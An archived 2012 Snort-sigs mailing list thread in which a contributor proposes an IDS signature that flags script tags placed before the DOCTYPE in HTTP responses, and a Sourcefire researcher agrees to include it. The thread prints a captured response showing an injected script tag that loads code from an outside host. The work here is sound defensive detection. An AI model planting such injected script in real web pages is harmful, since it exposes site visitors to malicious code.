Re: SIG: Script before DOCTYPE

["Lay, James" <james.lay () wincofoods com>]

Go for it Alex...thank you.

 

James

 

From: Alex Kirk [mailto:akirk () sourcefire com] 
Sent: Thursday, June 21, 2012 1:37 PM
To: Lay, James
Cc: snort-sigs () lists sourceforge net
Subject: Re: [Snort-sigs] SIG: Script before DOCTYPE

 

That actually seems reasonable. You should only ever see <!DOCTYPE at
the start of a page, so I'd be surprised if this generates false
positives. 

 

Would you like this to be included in the VRT set?

On Thu, Jun 21, 2012 at 3:27 PM, Lay, James <james.lay () wincofoods com>
wrote:

All,

 

Not sure if this is a good sig or not:

 

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALWARE
script before DOCTYPE possible malicious redirect";
flow:to_client,established; file_data; content:"</script><!DOCTYPE";
distance:0; nocase; metadata:policy security-ips drop, service http;
classtype:web-application-attack; sid:xxxxxxx; rev:1;)

 

Many times that I've seen malicious JavaScript injected it's usually
right at the top:

 

 

HTTP/1.1 200 OK

Date: Mon, 18 Jun 2012 17:29:21 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Set-Cookie: frontend=bleh; expires=Sun, 16-Sep-2012 17:29:21 GMT;
path=/; domain=www.glasstilestore.com; HttpOnly

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0

Pragma: no-cache

Set-Cookie: frontend=bleh; expires=Sun, 16-Sep-2012 17:29:21 GMT;
path=/; domain=www.glasstilestore.com; httponly

Vary: Accept-Encoding,User-Agent

X-UA-Compatible: IE=8

Keep-Alive: timeout=3, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/html; charset=UTF-8

dd13

<script src='http://httpjs.com/api&apos;
type='text/javascript'></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML
1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd";>

<html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="en" lang="en">

<head>

<!-- Google Website Optimizer Control Script -->

<script>

 

I welcome any pointers or reasons this sig stinks...danke J

 

James 


------------------------------------------------------------------------
------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond.
Discussions
will include endpoint security, mobile security and the latest in
malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!





 

-- 
Alex Kirk
AEGIS Program Lead
Sourcefire Vulnerability Research Team
+1-410-423-1937
alex.kirk () sourcefire com

------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/

_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!